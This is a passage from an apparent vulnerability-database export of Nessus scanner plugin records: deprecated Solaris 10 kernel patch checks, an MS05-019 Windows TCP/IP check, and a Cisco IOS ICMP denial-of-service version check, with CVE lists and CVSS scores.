Security Checks\";\n script_family(english:family[\"english\"]);\n \n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/Solaris/showrev\");\n exit(0);\n}\n\n\n\n# Deprecated.\nexit(0, \"The associated patch is not currently a recommended security fix.\");\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:C"}}, {"lastseen": "2021-08-19T13:16:55", "description": "SunOS 5.10_x86: kernel Patch.\nDate this patch was last updated by Sun : Oct/28/05\n\nThis plugin has been deprecated and either replaced 
with individual 118844 patch-revision plugins, or deemed non-security related.", "cvss3": {"score": null, "vector": null}, "published": "2005-08-02T00:00:00", "type": "nessus", "title": "Solaris 10 (x86) : 118844-20 (deprecated)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2004-0790", "CVE-2004-0791", "CVE-2005-3250", "CVE-2005-4701", "CVE-2008-1095"], "modified": "2021-01-14T00:00:00", "cpe": ["cpe:/o:sun:solaris"], "id": "SOLARIS10_X86_118844.NASL", "href": "https://www.tenable.com/plugins/nessus/19370", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# @DEPRECATED@\n#\n# Disabled on 2018/03/12. Deprecated and either replaced by\n# individual patch-revision plugins, or has been deemed a\n# non-security advisory.\n#\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(19370);\n script_version(\"1.40\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2004-0790\", \"CVE-2004-0791\", \"CVE-2005-3250\", \"CVE-2005-4701\", \"CVE-2008-1095\");\n\n script_name(english:\"Solaris 10 (x86) : 118844-20 (deprecated)\");\n script_summary(english:\"Check for patch 118844-20\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"This plugin has been deprecated.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"SunOS 5.10_x86: kernel Patch.\nDate this patch was last updated by Sun : Oct/28/05\n\nThis plugin has been deprecated and either replaced with individual\n118844 patch-revision plugins, or deemed non-security related.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://getupdates.oracle.com/readme/118844-20\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"n/a\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:N/I:N/A:C\");\n script_cwe_id(264);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n 
script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:sun:solaris\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/10/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/08/02\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Solaris Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Solaris/showrev\");\n\n exit(0);\n}\n\nexit(0, \"This plugin has been deprecated. Consult specific patch-revision plugins for patch 118844 instead.\");\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:C"}}, {"lastseen": "2021-08-19T13:17:27", "description": "The remote host runs a version of Windows that has a flaw in its TCP/IP stack.\n\nThe flaw may allow an attacker to execute arbitrary code with SYSTEM privileges on the remote host or to perform a denial of service attack against the remote host.\n\nProof of concept code is available to perform a denial of service attack against a vulnerable system.", "cvss3": {"score": null, "vector": null}, "published": "2005-04-12T00:00:00", "type": "nessus", "title": "MS05-019: Vulnerabilities in TCP/IP Could Allow Remote Code Execution (893066) (uncredentialed check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2005-0048", "CVE-2004-0790", "CVE-2004-1060", "CVE-2004-0230", "CVE-2005-0688"], "modified": "2018-11-15T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_KB893066.NASL", "href": "https://www.tenable.com/plugins/nessus/18028", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(18028);\n script_version(\"1.37\");\n script_cvs_date(\"Date: 2018/11/15 20:50:28\");\n\n script_cve_id(\"CVE-2005-0048\", \"CVE-2004-0790\", \"CVE-2004-1060\", 
\"CVE-2004-0230\", \"CVE-2005-0688\");\n script_bugtraq_id(13124, 13116);\n script_xref(name:\"MSFT\", value:\"MS05-019\");\n script_xref(name:\"MSKB\", value:\"893066\");\n\n script_name(english:\"MS05-019: Vulnerabilities in TCP/IP Could Allow Remote Code Execution (893066) (uncredentialed check)\");\n script_summary(english:\"Checks for hotfix KB893066\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"Arbitrary code can be executed on the remote host due to a flaw in the\nTCP/IP stack.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host runs a version of Windows that has a flaw in its\nTCP/IP stack.\n\nThe flaw may allow an attacker to execute arbitrary code with SYSTEM\nprivileges on the remote host or to perform a denial of service attack\nagainst the remote host.\n\nProof of concept code is available to perform a denial of service\nattack against a vulnerable system.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2005/ms05-019\");\n script_set_attribute(attribute:\"solution\", value:\"Microsoft has released a set of patches for Windows 2000, XP and 2003.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2004/04/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/04/12\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This 
script is Copyright (C) 2005-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Windows\");\n\n script_dependencies(\"tcp_seq_window.nasl\", \"os_fingerprint.nasl\");\n script_require_keys(\"TCP/seq_window_flaw\", \"Host/OS\", \"Settings/ParanoidReport\");\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nos = get_kb_item_or_exit(\"Host/OS\") ;\n\nconf = get_kb_item_or_exit(\"Host/OS/Confidence\");\nif (conf <= 70) exit(1, \"Can't determine the host's OS with sufficient confidence.\");\n\nif (\"Windows\" >!< os) exit(0, \"The host is not running Windows.\");\nif (\"Windows 4.0\" >< os) exit(0, \"Windows NT is not reported to be affected.\");\nif (\"Windows Server 2003 Service Pack\" >< os) exit(0, \"Windows 2003 SP1 and later are not reported to be affected.\");\n\nif (ereg(pattern:\"Windows (95|98|ME|XP|Server 2003)\", string:os))\n{\n if (get_kb_item(\"TCP/seq_window_flaw\"))\n {\n security_hole(port:get_kb_item(\"SMB/transport\"));\n exit(0);\n }\n else exit(0, \"The host is not affected.\");\n}\nelse exit(0, \"The host is not running one of the versions of Windows reportedly affected.\");\n", "cvss": {"score": 9, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:C"}}, {"lastseen": "2021-08-19T13:03:21", "description": "A document that describes how the Internet Control Message Protocol (ICMP) could be used to perform a number of Denial of Service (DoS) attacks against the Transmission Control Protocol (TCP) has been made publicly available. 
This document has been published through the Internet Engineering Task Force (IETF) Internet Draft process, and is entitled \"ICMP Attacks Against TCP\" (draft-gont-tcpm-icmp-attacks-03.txt ).\nThese attacks, which only affect sessions terminating or originating on a device itself, can be of three types:\nSuccessful attacks may cause connection resets or reduction of throughput in existing connections, depending on the attack type.\nMultiple Cisco products are affected by the attacks described in this Internet draft.\nCisco has made free software available to address these vulnerabilities. In some cases there are workarounds available to mitigate the effects of the vulnerability.", "cvss3": {"score": null, "vector": null}, "published": "2010-09-01T00:00:00", "type": "nessus", "title": "Crafted ICMP Messages Can Cause Denial of Service - Cisco Systems", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2004-0790", "CVE-2004-0791", "CVE-2004-1060", "CVE-2005-0065", "CVE-2005-0066", "CVE-2005-0067", "CVE-2005-0068"], "modified": "2018-11-15T00:00:00", "cpe": ["cpe:/o:cisco:ios"], "id": "CISCO-SA-20050412-ICMP.NASL", "href": "https://www.tenable.com/plugins/nessus/48985", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# Security advisory is (C) CISCO, Inc.\n# See https://www.cisco.com/en/US/products/products_security_advisory09186a0080436587.shtml\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(48985);\n script_version(\"1.16\");\n script_cve_id(\n \"CVE-2004-0790\",\n \"CVE-2004-0791\",\n \"CVE-2004-1060\",\n \"CVE-2005-0065\",\n \"CVE-2005-0066\",\n \"CVE-2005-0067\",\n \"CVE-2005-0068\"\n );\n script_bugtraq_id(13124);\n script_xref(name:\"CERT\", value:\"222750\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCed78149\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCef43691\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCef44699\");\n script_xref(name:\"CISCO-BUG-ID\", 
value:\"CSCef45332\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCef46728\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCef54204\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCef54206\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCef54947\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCef57566\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCef60659\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCef61610\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCeh04183\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCeh20083\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCeh45454\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCeh59823\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCeh62307\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCeh63449\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCeh65337\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCsa52807\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCsa59600\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCsa60692\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCsa61864\");\n script_xref(name:\"CISCO-SA\", value:\"cisco-sa-20050412-icmp\");\n\n script_name(english:\"Crafted ICMP Messages Can Cause Denial of Service - Cisco Systems\");\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is missing a vendor-supplied security patch\" );\n script_set_attribute(attribute:\"description\", value:\n'A document that describes how the Internet Control Message Protocol\n(ICMP) could be used to perform a number of Denial of Service (DoS)\nattacks against the Transmission Control Protocol (TCP) has been made\npublicly available. 
This document has been published through the\nInternet Engineering Task Force (IETF) Internet Draft process, and is\nentitled \"ICMP Attacks Against TCP\"\n(draft-gont-tcpm-icmp-attacks-03.txt ).\nThese attacks, which only affect sessions terminating or originating on\na device itself, can be of three types:\nSuccessful attacks may cause connection resets or reduction of\nthroughput in existing connections, depending on the attack type.\nMultiple Cisco products are affected by the attacks described in this\nInternet draft.\nCisco has made free software available to address these\nvulnerabilities. In some cases there are workarounds available to\nmitigate the effects of the vulnerability.\n');\n script_set_attribute(attribute:\"see_also\", value: \"https://www.gont.com.ar/drafts/icmp-attacks-against-tcp.html\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20050412-icmp\n script_set_attribute(attribute:\"see_also\", value: \"http://www.nessus.org/u?1ba12045\");\n # https://www.cisco.com/en/US/products/products_security_advisory09186a0080436587.shtml\n script_set_attribute(attribute:\"see_also\", value: \"http://www.nessus.org/u?8b803ffb\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the relevant patch referenced in Cisco Security Advisory\ncisco-sa-20050412-icmp.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value: \"local\");\n script_set_attribute(attribute:\"cpe\", value: \"cpe:/o:cisco:ios\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2005/04/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value: \"2005/04/12\");\n 
script_set_attribute(attribute:\"plugin_publication_date\", value: \"2010/09/01\");\n script_cvs_date(\"Date: 2018/11/15 20:50:20\");\n\n script_end_attributes();\n script_summary(english:\"Uses SNMP to determine if a flaw is present\");\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is (C) 2010-2018 Tenable Network Security, Inc.\");\n script_family(english:\"CISCO\");\n script_dependencie(\"cisco_ios_version.nasl\");\n script_require_keys(\"Host/Cisco/IOS/Version\");\n exit(0);\n}\ninclude(\"cisco_func.inc\");\n\n#\n\nversion = get_kb_item_or_exit(\"Host/Cisco/IOS/Version\");\n\n# Affected: 12.0\nif (check_release(version: version,\n patched: make_list(\"12.0(28c)\") )) {\n security_warning(port:0, extra: '\\nUpdate to ' + patch_update + ' or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.0DA\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.2(12)DA8 or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.0DB\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(14)T or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.0DC\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.2(15)BC2f or later\\n'); exit(0);\n}\n# Affected: 12.0S\nif (check_release(version: version,\n patched: make_list(\"12.0(27)S5\", \"12.0(28)S3\", \"12.0(30)S1\", \"12.0(31)S\"))) {\n security_warning(port:0, extra: '\\nUpdate to ' + patch_update + ' or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.0SC\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.2(15)BC2f or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.0SL\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.0(31)S or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.0SP\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.0(31)S or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.0ST\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.0(31)S or later\\n'); exit(0);\n}\nif 
(deprecated_version(version, \"12.0SX\")) {\n security_warning(port:0, extra: '\\nNo fixes are planned for 12.0SX releases. Upgrade to a supported release\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.0SZ\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.0(31)S or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.0T\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.1(27) or later\\n'); exit(0);\n}\n# Affected: 12.0W5\nif (\"W5\" >< version &&\n check_release(version: version,\n patched: make_list(\"12.0(25)W5(27c)\", \"12.0(28)W5(31a)\") )) {\n security_warning(port:0, extra: '\\nUpdate to ' + patch_update + ' or later\\n'); exit(0);\n}\n# Affected: 12.0WC\nif (check_release(version: version,\n patched: make_list(\"12.0(5)WC12\") )) {\n security_warning(port:0, extra: '\\nUpdate to ' + patch_update + ' or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.0XA\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.1(27) or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.0XB\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.1(27) or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.0XC\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.1(27) or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.0XD\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.1(27) or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.0XE\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.1(26)E1 or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.0XF\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.1(27) or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.0XG\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.1(27) or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.0XH\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.1(27) or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.0XI\")) {\n 
security_warning(port:0, extra: '\\nUpdate to 12.1(27) or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.0XJ\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.1(27) or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.0XK\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.2(28) or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.0XL\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.2(28) or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.0XM\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.1(27) or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.0XN\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.1(27) or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.0XQ\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.1(27) or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.0XR\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.2(28) or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.0XS\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.1(26)E1 or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.0XV\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.1(27) or later\\n'); exit(0);\n}\n# Affected: 12.1\nif (check_release(version: version,\n patched: make_list(\"12.1(27)\"))) {\n security_warning(port:0, extra: '\\nUpdate to ' + patch_update + ' or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.1AA\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.2(28) or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.1AX\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.2(25)EY or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.1AZ\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.1(22)EA4 or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.1DA\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.2(12)DA8 or later\\n'); 
exit(0);\n}\nif (deprecated_version(version, \"12.1DB\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(14)T or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.1DC\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.2(15)BC2f or later\\n'); exit(0);\n}\n# Affected: 12.1E\nif (check_release(version: version,\n patched: make_list(\"12.1(22)E6\", \"12.1(23)E3\", \"12.1(26)E1\") )) {\n security_warning(port:0, extra: '\\nUpdate to ' + patch_update + ' or later\\n'); exit(0);\n}\n# Affected: 12.1EA\nif (check_release(version: version,\n patched: make_list(\"12.1(22)EA4\") )) {\n security_warning(port:0, extra: '\\nUpdate to ' + patch_update + ' or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.1EB\")) {\n security_warning(port:0, extra: '\\nNo fixes are available for 12.1EB releases. Upgrade to a supported release\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.1EC\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.2(15)BC2f or later\\n'); exit(0);\n}\n# Affected: 12.1EO\nif (check_release(version: version,\n patched: make_list(\"12.1(19)EO4\") )) {\n security_warning(port:0, extra: '\\nUpdate to ' + patch_update + ' or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.1EU\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.2(20)EU or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.1EV\")) {\n security_warning(port:0, extra: '\\nNo fixes are available for 12.1EV releases. 
Upgrade to a supported release\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.1EW\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.2(18)EW3 or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.1EX\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.1(26)E1 or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.1EY\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.1(26)E1 or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.1T\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.2(28) or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.1XA\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.2(28) or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.1XB\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.2(28) or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.1XC\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.2(28) or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.1XD\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.2(28) or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.1XE\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.1(26)E1 or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.1XF\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.2(28) or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.1XG\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(13) or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.1XH\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.2(28) or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.1XI\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.2(28) or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.1XJ\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(13) or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.1XL\")) {\n security_warning(port:0, extra: '\\nUpdate 
to 12.3(13) or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.1XM\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(13) or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.1XP\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(13) or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.1XQ\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(13) or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.1XR\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(13) or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.1XT\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(13) or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.1XU\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(13) or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.1XV\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(13) or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.1YA\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(13) or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.1YB\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(13) or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.1YC\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(13) or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.1YD\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(13) or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.1YE\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(13) or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.1YF\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(13) or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.1YH\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(13) or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.1YI\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(13) or 
later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.1YJ\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.1(22)EA4 or later\\n'); exit(0);\n}\n# Affected: 12.2\nif (check_release(version: version,\n patched: make_list(\"12.2(28)\"))) {\n security_warning(port:0, extra: '\\nUpdate to ' + patch_update + ' or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.2B\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(14)T or later\\n'); exit(0);\n}\n# Affected: 12.2BC\nif (check_release(version: version,\n patched: make_list(\"12.2(15)BC2f\") )) {\n security_warning(port:0, extra: '\\nUpdate to ' + patch_update + ' or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.2BW\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(13) or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.2BY\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(14)T or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.2BZ\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(7)XI5 or later\\n'); exit(0);\n}\n# Affected: 12.2CX\nif (deprecated_version(version, \"12.2CX\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.2(15)BC2f or later\\n'); exit(0);\n}\n# Affected: 12.2CY\nif (deprecated_version(version, \"12.2CY\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.2(15)BC2f or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.2CZ\")) {\n security_warning(port:0, extra: '\\nNo fix is planned for 12.2CZ releases. 
Upgrade to a supported release\\n'); exit(0);\n}\n# Affected: 12.2DA\nif (check_release(version: version,\n patched: make_list(\"12.2(12)DA8\") )) {\n security_warning(port:0, extra: '\\nUpdate to ' + patch_update + ' or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.2DD\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(14)T or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.2DX\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(14)T or later\\n'); exit(0);\n}\n# Affected: 12.2EU\nif (check_release(version: version,\n patched: make_list(\"12.2(20)EU\"))) {\n security_warning(port:0, extra: '\\nUpdate to ' + patch_update + ' or later\\n'); exit(0);\n}\n# Affected: 12.2EW\nif (check_release(version: version,\n patched: make_list(\"12.2(18)EW3\") )) {\n security_warning(port:0, extra: '\\nUpdate to ' + patch_update + ' or later\\n'); exit(0);\n}\n# Affected: 12.2EWA\nif (check_release(version: version,\n patched: make_list(\"12.2(25)EWA\") )) {\n security_warning(port:0, extra: '\\nUpdate to ' + patch_update + ' or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.2EX\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.2(25)SEB or later\\n'); exit(0);\n}\n# Affected: 12.2EY\nif (check_release(version: version,\n patched: make_list(\"12.2(25)EY\") )) {\n security_warning(port:0, extra: '\\nUpdate to ' + patch_update + ' or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.2JA\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(4)JA or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.2JK\")) {\n security_warning(port:0, extra: '\\nNo fixes are available for 12.2JK releases. Upgrade to a supported release\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.2MB\")) {\n security_warning(port:0, extra: '\\nNo fixes are available for 12.2MB releases. 
Upgrade to a supported release\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.2MC\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(14)T or later\\n'); exit(0);\n}\n# Affected: 12.2S\nif (check_release(version: version,\n patched: make_list(\"12.2(14)S13\", \"12.2(18)S8\", \"12.2(20)S7\", \"12.2(25)S3\") )) {\n security_warning(port:0, extra: '\\nUpdate to ' + patch_update + ' or later\\n'); exit(0);\n}\n# Affected: 12.2SE\nif (check_release(version: version,\n patched: make_list(\"12.2(25)SEB\"))) {\n security_warning(port:0, extra: '\\nUpdate to ' + patch_update + ' or later\\n'); exit(0);\n}\n# Affected: 12.2SO\nif (check_release(version: version,\n patched: make_list(\"12.2(18)SO1\") )) {\n security_warning(port:0, extra: '\\nUpdate to ' + patch_update + ' or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.2SU\")) {\n security_warning(port:0, extra: '\\nNo fixes are available for 12.2SU releases. Upgrade to a supported release\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.2SV\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.2(25)S3 or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.2SW\")) {\n security_warning(port:0, extra: '\\nNo fixes are available for 12.2SW releases. 
